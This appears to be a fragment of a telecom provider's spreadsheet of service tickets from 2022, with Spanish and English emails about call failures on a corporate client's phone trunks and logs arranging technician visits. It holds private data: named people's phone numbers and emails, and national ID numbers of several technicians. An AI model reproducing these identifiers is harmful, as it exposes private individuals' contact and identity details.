CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; SOFIA ANDREA MAYEN RIVAS &lt;SOFIA.MAYEN@CLARO.COM.GT&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473 // PTT TICKET SD1126903
MUCHAS GRACIAS POR LA CONFIRMACIÓN! MAÑANA DAMOS SEGUIMIENTO A NIVEL DE CLARO Y EN CUANTO NOSOTROS TERMINEMOS DE REALIZAR NUESTRAS VALIDACIONES LES INFORMAREMOS  POR ESTE MEDIO LO REALIZADO Y LO UBICADO POR MEDIO DE LAS TRAZAS Y OTRAS PRUEBAS QUE REALIZAREMOS.
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;
DE: ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 15:47
PARA: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; APMM.DCSC &lt;APMM.DCSC@ORANGE.COM&gt;; N&amp;EV - MYPHONE L1 &lt;NEV-MYPHONEL1@MAERSK.COM&gt;; +D N&amp;EV MYPHONE LEADS &lt;DNTMYPHONELEADS@MAERSK.COM&gt;; ESVIN ANTONIO PAREDES SAMUY &lt;ESVIN.PAREDES@CLARO.COM.GT&gt;; RONALD SMELIN VELASQUEZ ASTORGA &lt;RONALD.VELASQUEZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; SOFIA ANDREA MAYEN RIVAS &lt;SOFIA.MAYEN@CLARO.COM.GT&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473 // PTT TICKET SD1126903
CONFIRMO, YA ESTÁN AURTORIZADOS.
ALEXANDER CARTAGENA
IT SUPPORT TECHNICIAN ¿ GUATEMALA
MAERSK TECHNOLOGY - END-USER SUPPORT &amp; ENABLEMENT
PHONE: +502 3422-4345
EMAIL: ALEXANDER.CARTAGENA@MAERSK.COM</t>
  </si>
  <si>
    <t>#SE RECIBE LLAMADA DE CLIENTE Y DE  JOSUE SIAM ##
JOSUE SIAM NOS INDICA QUE AVI APLICO CONFIGURACION YREGLAS A CLIENTE, CLIENTE CARTAGENA REALIZA PRUEBAS Y YA COMPLETAN LLAMADAS ## SE PASA CASO A PC, SE  VALIDARA EN 1 HORA ##VIVO ##</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREOS: ##CLIENTE ALEXANDER CARTAGENA VALIDO VIA LLAMADA, PERO COMENTO QUE NECESITABA QUE TAMBIEN SE VALIDARA VIA CORREO-## EN ESPERA DE RESPUESTA-
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 3 DE JUNIO DE 2022 15:12
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; APMM.DCSC &lt;APMM.DCSC@ORANGE.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; N&amp;EV - MYPHONE L1 &lt;NEV-MYPHONEL1@MAERSK.COM&gt;; +D N&amp;EV MYPHONE LEADS &lt;DNTMYPHONELEADS@MAERSK.COM&gt;; ESVIN ANTONIO PAREDES SAMUY &lt;ESVIN.PAREDES@CLARO.COM.GT&gt;; RONALD SMELIN VELASQUEZ ASTORGA &lt;RONALD.VELASQUEZ@CLARO.COM.GT&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; SOFIA ANDREA MAYEN RIVAS &lt;SOFIA.MAYEN@CLARO.COM.GT&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473 // PTT TICKET SD1126903
BUENA TARDE ESTIMADOS, YA HEMOS SOLVENTADO EL PROBLEMA CON NUESTRO PROVEEDOR,  EL INCONVENIENTE DETECTADO FUE PROBLEMA DE CONFIGURACIÓN EN CENTRAL , POR LO QUE SOLICITAMOS NOS PUEDAN APOYAR A REALIZAR PRUEBAS EN LLAMADAS Y  CONFIRMAR SI  YA ESTA SOLVENTADO EL INCONVENIENTE, PARA PROCEDER CON EL CIERRE DEL TICKET.
-------------------------------------------------
GOOD AFTERNOON, WE SCALE IT WITH OUR SUPPLIER TO SOLVE THE PROBLEM. AND OUR SUPPLIER SOLVED THE PROBLEM. THE PROBLEM IT WAS: CONFIGURATION IN CENTRAL., NEED TO YOU REALIZE CALLS RIGTH NOW AND CONFIRMED IF TO RESOLVED,  FOR  REALICE THE CLOSE TICKET.
BEST REGARDS, SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 3 DE JUNIO DE 2022 15:03
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; APMM.DCSC &lt;APMM.DCSC@ORANGE.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; N&amp;EV - MYPHONE L1 &lt;NEV-MYPHONEL1@MAERSK.COM&gt;; +D N&amp;EV MYPHONE LEADS &lt;DNTMYPHONELEADS@MAERSK.COM&gt;; ESVIN ANTONIO PAREDES SAMUY &lt;ESVIN.PAREDES@CLARO.COM.GT&gt;; RONALD SMELIN VELASQUEZ ASTORGA &lt;RONALD.VELASQUEZ@CLARO.COM.GT&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; SOFIA ANDREA MAYEN RIVAS &lt;SOFIA.MAYEN@CLARO.COM.GT&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473 // PTT TICKET SD1126903
BUENA TARDE ESTIMADOS, CON RESPECTO AL SERVICIO LE COMENTO: EL DIA DE HOY VIERNES POR LA MAÑANA, NUESTRO PERSONAL TÉCNICO LLEGO A SUS INSTALACIONES EN PUNTO REMOTO Y CON APOYO DE NUESTROS ESPECIALISTAS REALIZAMOS PRUEBAS, CON LOS DOS E1'S:
MAERSK SIP 23797200 ¿ 23797299  SIP
VESTA_LOGISTICS 23770500 - 23770599 PRI
CON REPECTO AL: VESTA_LOGISTICS 23770500 - 23770599 PRI NO ENCONTRAMOS INCONVENIENTE ALGUNO, LAS LLAMADAS ENTRANTES Y SALIENTES COMPLETARON EXITOSAMENTE. PERO CON EL E1: MAERSK SIP 23797200 ¿ 23797299  SIP ENCONTRAMOS EL INCONVENIENTE CON LLAMADAS SALIENTES, POR LO QUE ESCALAMOS CON NUESTRO PROVEEDOR PARA SOLVENTAR EL PROBLEMA.
-------------------------------------------------------------------------------------------------
GOOD AFTERNOON, TODAY FRIDAY'S MORNING, OUR TECHNICIAN CAME TO YOUR OFFICE AND WITH HELP OF OUR SPECIALIST, WE REALIZED TESTS WITH THE TWO E1'S.
MAERSK SIP 23797200 ¿ 23797299  SIP
VESTA_LOGISTICS 23770500 - 23770599 PRI
WITH THE FIRST, WE DON'T FIND ANY INCONVENIEN, THE IN CALLS AND THE CALLS OUT WERE COMPLETELY SUCCESFULL. WITH THE.VESTA_LOGISTICS 23770500 - 23770599 PRI... WE FOUND THAT THE CALL OUT HAVE SOME PROBLEM, SO WE SCALE IT WITH OUR SUPPLIER TO SOLVE THE PROBLEM.
BEST REGARDS,SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS!</t>
  </si>
  <si>
    <t>CLIENTE HA CONFIRMADO VISITA + NOSOTROS TAMBIEN LE CONFIRMAMOS  TAMBIEN LA VISITA  #### SE HA ENVIADO CORREO Y SE LE PIDE CONFIRMAR PERMISOS HACIA NUESTROS TECNICOS-
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 15:32
PARA: ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; APMM.DCSC &lt;APMM.DCSC@ORANGE.COM&gt;; N&amp;EV - MYPHONE L1 &lt;NEV-MYPHONEL1@MAERSK.COM&gt;; +D N&amp;EV MYPHONE LEADS &lt;DNTMYPHONELEADS@MAERSK.COM&gt;; ESVIN ANTONIO PAREDES SAMUY &lt;ESVIN.PAREDES@CLARO.COM.GT&gt;; RONALD SMELIN VELASQUEZ ASTORGA &lt;RONALD.VELASQUEZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; SOFIA ANDREA MAYEN RIVAS &lt;SOFIA.MAYEN@CLARO.COM.GT&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473 // PTT TICKET SD1126903
BUENA TARDE ESTIMADO, GRACIAS POR CONFIRMAR. NOSOTROS TAMBIÉN CONFIRMAMOS QUE EL EQUIPO YA ESTA ENTERADO SOBRE ESTE CASO, POR LO QUE MAÑANA DAREMOS SEGUIMIENTO ALLÁ EN PUNTO REMOTO A LAS 6AM, SEGÚN LO ACORDADO.
NOTA: FAVOR CONFIRMAR  SI YA ESTAN AUTORIZADOS LOS PERMISOS PARA NUESTROS TÉCNICOS-
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! ¿¿</t>
  </si>
  <si>
    <t>####SE HA ENVIADO CORREO NUEVAMETE A CLIETE CON LOS DATOS DE LOS TECNICOS, EN ESPERA DE QUE CLIENTE NOS INDIQUE FECHA Y HORA PARA REALIZAR VISITA TECNICA..
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 8:55
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; APMM.DCSC@ORANGE.COM &lt;APMM.DCSC@ORANGE.COM&gt;; ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; N&amp;EV - MYPHONE L1 &lt;NEV-MYPHONEL1@MAERSK.COM&gt;; +D N&amp;EV MYPHONE LEADS &lt;DNTMYPHONELEADS@MAERSK.COM&gt;; ESVIN ANTONIO PAREDES SAMUY &lt;ESVIN.PAREDES@CLARO.COM.GT&gt;; RONALD SMELIN VELASQUEZ ASTORGA &lt;RONALD.VELASQUEZ@CLARO.COM.GT&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; SOFIA ANDREA MAYEN RIVAS &lt;SOFIA.MAYEN@CLARO.COM.GT&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473 // PTT TICKET SD1126903
HI.  YESTERDAY WE TESTED TRACE OF CALL. NEVERTHELESS IS ESSENTIAL TO GET MORE TESTS DONE AND IS NECESSARY THAT YOU SCHEDULE A TECHNICAL VISIT TO THE OFFICE IN GUATEMALA CITY. THE SPECIALIST WILL CONNECT WITH OUR EQUIPMENT THAT IS IN YOUR OFFICE.  PLEASE, IS ESSENTIAL TO INTERRUMP TOTALLY THE SERVICE OF CALLS WHILE THE SPECIALIST WILL BE DOING THE TESTS.
WHEN YOU HAVE A DATE AND HOUR FOR THE TECHNICAL VISIT LET ME KNOW.
BELOW, WILL BE ATTACHED THE PERSONAL INFORMATION OF THE SPECIALIST FOT THE PERMISSION MANAGEMENT.
NAM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NOTE: YESTERDEY IN OTHER EMAIL WE SEND TO THIS INFORMATION A SR CARTAGENA.
BUENAS TARDES
ESTIMADO ALEXANDER CARTAGENA
POR ESTE MEDIO QUISIERA INFORMARLE QUE SE REALIZARON TRAZAS CON EL APOYO DE NUESTRO ESPECIALISTA JOSUÉ SIAM Y LA SEÑORITA CLAUDIA IVONNE CHAVARRÍA, LO CUAL EN LA CONFERENCIA QUE SE SOSTUVO, ES NECESARIO LLEGAR A LAS INSTALACIONES CON UN EMULADOR Y REALIZAR NUEVAMENTE PRUEBAS DE TRAZA, AL REALIZAR ESTAS PRUEBAS ES NECESARIO DESCONECTAR SU PBX Y COLOCAR EL EMULADOR Y ESTO IMPLICA QUE NO PODRÁN SACAR NI RECIBIR LLAMADAS DURANTE EL PROCESO, POR LO QUE SOLICITO QUE NOS APOYE EN QUE NOS DE UNA FECHA Y HORA PARA REALIZAR ESTAS PRUEBAS Y NO AFECTE SU OPERACIÓN.
A CONTINUACIÓN, LE ENVÍO EL LISTADO DEL POSIBLE TÉCNICO QUE LLEGARA A REALIZAR DICHAS PRUEBAS, POR LO QUE SOLICITO DE SU APOYO SI HAY QUE GESTIONAR ALGÚN TIPO DE INGRESO AL EDIFICIO .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QUEDO A LA ESPERA DE SUS COMENTARIOS.
NOTA: EN OTRA COLA DE CORREO SE LE SOLICITO EL INDICARNOS FECHA Y HORA PARA INTERRUPCION DE SERVICIO, PARA QUE CLARO REALICE PRUEBAS CORRESPONDIENTES, QUEDAMOS AL PENDIENTE
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>NO HAY INFORMACIÓN DE LA RAZÓN DE EL ESTADO DE LA FALLA, POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTES CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. NOTIFICAN QUE LE BRINDARAN SEGUIMIENTO EN HORARIO HÁBIL Y NO HAY SEGUIMIENTO ALGUNO Y YA EXISTE UNA COLA DE CORREOS EL CUAL SE LES NOTIFICO Y NO HAY SEGUIMIENTO. SE NOTIFICA VÍA SKYPE AL GESTOR MARIAI.GODINEZ POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.
DE: APMM.DCSC@ORANGE.COM [MAILTO:APMM.DCSC@ORANGE.COM]
ENVIADO EL: LUNES, 30 DE MAYO DE 2022 15:40
PARA: ALEXANDER CARTAGENA; MARIA ISABEL GODINEZ SAENZ; N&amp;EV - MYPHONE L1; +D N&amp;EV MYPHONE LEADS; ESVIN ANTONIO PAREDES SAMUY
CC: ISO.CNOC.ACCESOS; GUSTAVO ADOLFO BARAHONA PUTUL; HUGO JOSE SOTO SAMAYOA; SOFIA ANDREA MAYEN RIVAS; CLIENTESCORPORATIVOS; MONICA YIREH CASTILLO POON; ZZZ ECS APMM DCSC; ZZZ ECS APMM DCSC
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473 // PTT TICKET SD1126903
HELLO ALL,
KINDLY FIND THE BELOW MOM OF THE CALL:
¿	PTT ASKED USER TO DO 3 ATTEMPTS TO CALL
¿	ALL CALLS WENT THROUGH AFTER RINGING 3 TIMES ON OUR END
¿	AND THEN WHEN THEY ANSWER ON THE OTHER LINE, IT GETS AUTOMATICALLY DISCONNECTED
¿	ALSO, THE CALLER ID SHOWS A DIFFERENT NUMBER NOT OURS
NEXT ACTIONS :
¿	PTT  WILL SCHEDULE A VISIT TO THE ACTUAL OFFICE TO TROUBLESHOOT THE EQUIPMENT
BEST REGARDS,</t>
  </si>
  <si>
    <t>F4578536</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO MORALES AL 77486934  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001426374
**</t>
  </si>
  <si>
    <t>F4578544</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA GESTIONAR LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 17:47
PARA: SOPORTE@INNOVATELCO.NET &lt;SOPORTE@INNOVATELCO.NET&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERMISOS || INNOVA OUTSOURSING, S.A. || 863400073T || SD1129401
BUENA TARDE
       SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
NOMBRE: BRIAN ROGELIO JOSIMAR CARRILLO ARGUETA                                          IBM: 530027
DPI: 2215803950101
ADJUNTO INFORMACIÓN DE QUIENES HAN SIDO ASIGNADOS A LA REVISIÓN Y RESOLUCIÓN DE FALLA, PARA MAÑANA VIERNES 26 A LAS 8:00 HORAS Y AL MISMO TIEMPO INFORMAR A ENCARGADOS DE BRINDAR ACCESO PARA AGILIZAR LOS PROCESOS, QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE AUTORIZANDO LOS PERMISOS
DE: SOPORTE INNOVA TELECOMUNICACIONES &lt;SOPORTE@INNOVATELCO.NET&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 17:53
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTION DE PERMISOS || INNOVA OUTSOURSING, S.A. || 863400073T || SD1129401
BUENA TARDE.
GRACIAS POR EL APOYO, LE CONFIRMO, SE GENERAN ACCESOS, PUEDEN PROCEDER CON LA VISITA.
SALUDOS.
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, RESPONDE CARLOS, Y PROPORCIONA DATOS PARA VISITA E INDICA QUE PUEDEN ATENDER HASTA EL DIA DE MAÑANA.
2001451201
COLA:
NOMBRE: A: 23049696
NÚMERO: 011 50223049696
DURACIÓN: 0:07:38
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50223049696
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 26/05/2022 17:01:44</t>
  </si>
  <si>
    <t>F4578550</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 24505913  NO RESPONDE, SE INTENTARA LUEGO
-ID 2001463040</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARLON  AL 94505913 ||SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
ID 2001499937
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANGEL - 97773924 PARA SOLICITAR DATOS DE VISITA
-ID 2001556112
NOMBRE DEL CLIENTE: RED TECNOLOGICA -
UBICACIÓN:SANTA LUCIA, BARRIO EL CENTRO SANTA LUCIA INTIBUCANA
CONTACTO EN SITIO: ANGEL - 97773924
HORARIO DE ATENCION:HASTA LAS 17 HRS
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS O MARLON AL 24505913 OPERADORA INDICA QUE ES NUMERO INCOMPLETO, SE INTENTARA LUEGO **
ID 2001432342
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SEÑOR  ANGEL SALAZAR  97773924 INDICA QUE NO ESTA EN EL SITO QUE SE LE LLAME AL SEÑOR CARLOS O MARLON AL 24505913 **
ID 2001430803
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR  AL 94505913 CONTESTA EL SEÑOR MARLON INDICA QUE ESTA EN SITIO SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 2001494050
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FABRICIO CANALES 96296766 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO ANGEL - 97773924
-ID 2001552152</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FABRICIO CANALES AL 96296766 Y BRINDA EL NUMERO DE LA PERSONA EN SITIO EL SEÑOR  ANGEL SALAZAR  97773924 **
ID 2001429689
**</t>
  </si>
  <si>
    <t>****SE LLAMA A CLIENTE SEÑOR  ANGEL SALAZAR  97773924 PARA CONFIRMAR NUMERO BRINDADO ANTERIORMENTE YA QUE EN ESE NUMERO NO RESPONDEN Y BRINDA NUMERO CORRECTO 94505913  **
ID 2001493634
**</t>
  </si>
  <si>
    <t>F4578552</t>
  </si>
  <si>
    <t>|| SE LE ENVIA LOS DATOS A CLIENTE SOLICITANDO ACCESOS PARA LA VISITA DE MAÑANA VIERNES 8 HRS ||
ERITO FERNANDO TECU XITUMUL
ASUNTO: VISITA TÉCNICA 1082416OH || RED TECNOLOGICA - || AGENCIA COOPERATIVA FRONTERIZA COACFIL MAGDALENA
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO REPORTADO 1082416OH || RED TECNOLOGICA - || AGENCIA COOPERATIVA FRONTERIZA COACFIL  MAGDALENA.
LE COMENTO QUE SE ESTÁ COORDINANDO UNA VISITA TÉCNICA PARA EL DÍA DE MAÑANA VIERNES 27/05 A PARTIR DE LAS 8:00 HRS. POR LO CUAL SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR LOS ACCESOS CORRESPONDIENTES PARA NUESTRO PERSONAL TÉCNICO ASIGNADO.
AVANTEC BRYAN GEOVANNY PERALTA CHACON 0801.1995.15329
AVANTEC GERSON RENE CASTELLANOS IZAGUIRRE 0301.1992.02423
QUEDAMOS ATENTOS A SU CONFIRMACIÓN PARA PROCEDER.
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  FABRICIO CANALES 96296766 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001683332</t>
  </si>
  <si>
    <t xml:space="preserve">
SE LLAMA A CLIENTE FABRICIO CANALES 96296766 MENCIONA QUE ESTARA VALIDANDO CON PR POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 2001600047</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FABRICIO CANALES 96296766 MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO PERO SOLICITA LLAMADA PARA LAS 17:00 HRS
-ID 2001610121</t>
  </si>
  <si>
    <t>F4578553</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ULISES CAMBRAN AL 78304063 -31385181 NO RESPONDE, ENVIAN A BUZON AMBOS NUMEROS || SE INTENTARA LUEGO **
ID 2001503776 - 2001503987
**</t>
  </si>
  <si>
    <t>F4578564</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE TECNICO QUIEN INDICA QUE CLIENTE INDICA QUE CLIENTE REPROHRAMA VISITA PARA MAÑANA 7 AM || SE LLAMA A CLIENTE CARLOS 57748704 QUIEN CONFIRMA VISITA PARA MAÑANA A LAS 7 AM
2001449751
COLA:
NOMBRE: A: 57748704
NÚMERO: 57748704
DURACIÓN: 0:01:32
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 57748704
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 26/05/2022 16:50:08</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE, CARLOS, CONFIRMA DATOS PARA VISITA E INDICA QUE DE SER NECESARIO ESPERARA A LOS TECNICOS HOY, EL TIEMPO NECESARIO, NO HORARIO SOLO INDICA QUE SE LE LLAME SI SE VA LLEGAR AL SITIO Y EL ESTARA DISPOBLE HASTA QUE EL SERVIO SE HAYA RESTABLECIDO.
2001436679
COLA:
NOMBRE: A: 57748704
NÚMERO: 57748704
DURACIÓN: 0:02:39
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 57748704
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 26/05/2022 16:08:08</t>
  </si>
  <si>
    <t>F4578568</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS BUSTILLO AL  95620200 INDICA QUE HACE UN MOMENTO LE LLAMARON Y DIO EL NUMERO DE LA PERSONA QUE ESTA EN SITIO **
ID 2001436095
**</t>
  </si>
  <si>
    <t>F4578569</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE PRESENTA FALLA POR ENERGIA EN PUNTO REMOTO.
BUENAS TARDE COMPAÑEROS, TENDRÁN INFORMACIÓN DE LA SUCURSAL CC_AZTECA_GT_SUC007268/265900367T
JORGE, 15:26
BUENA TARDES, NO SE CUENTA CON ENERGÍA</t>
  </si>
  <si>
    <t>SE CONSULTA EN CHAT SKYPE BANCO AZTECA PROACTIVO.</t>
  </si>
  <si>
    <t>F4578577</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 44990369 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001438778
**</t>
  </si>
  <si>
    <t>F4578582</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 503-74972469 / 503-7730-4783 PAR SEGUIMIENTO, NO CONTESTA; LA CENTRAL 66209720 EXT 113021 TAMPOCO LO HACE.
SE CONSULTA A CNOC CLARO VÍA SKYPE CÓMO VEN COMPORTAMIENTO DEL SERVICIO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE IVAN RIVERA AL 23140237  INDICAN QUE ES NUMERO EQUIVOCADO  **
ID 2001440961
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE IVAN RIVERA 23140237 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001461</t>
  </si>
  <si>
    <t>F4578591</t>
  </si>
  <si>
